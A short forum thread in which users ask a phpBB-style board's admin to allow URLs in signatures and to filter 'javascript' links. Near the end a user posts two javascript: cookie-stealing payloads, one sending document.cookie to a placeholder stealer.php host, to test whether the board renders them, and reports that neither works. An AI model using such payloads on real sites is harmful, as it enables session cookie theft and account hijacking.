URLs not allowed in signatures?

Hey comperr,

It'd be nice if you could allow URLs in signatures -- I don't see why you wouldn't allow them..

Oh, and just a side note: have you changed javascript to go to java script or something like that? If not, just add javascript to the word censors and put the output as java script

Thanks!

I'll think about the URL in sigs thing. However I may go for a "no ads" policy.
Why the javascript rule?

I think the javascript was something CS.net uses/d, though I don't remember the particular reason.

Back to the original point, I'm all for links in sigs though. Any link in someone's sig is advertising something, so I think it would be silly to institute a policy against it. Plus, people only see signature links if the person in question is contributing.

Lets see where it goes. I allowed up to two URLs in sigs. If people need more and it is not abused I'll remove or raise the cap.

Thanks, comperr, I personally think 3 or 4 is best, but no more than 5. If you allow more than 5, there's always the people that add like twenty retarded, useless links...

Oh and for the javascript, it's on CS.net and it's to prevent javascript links, for example, to prevent cookie stealing or something.

javascript:document.location='stealer.php?cookie='+document.cookie;

Edit: oh, guess there's no need - does phpBB only recognize links with http:// in front of them?

Edit2: javascript:document.location='http://sitename.com/stealer.php?cookie='+document.cookie;

Nothing works, no need for it.
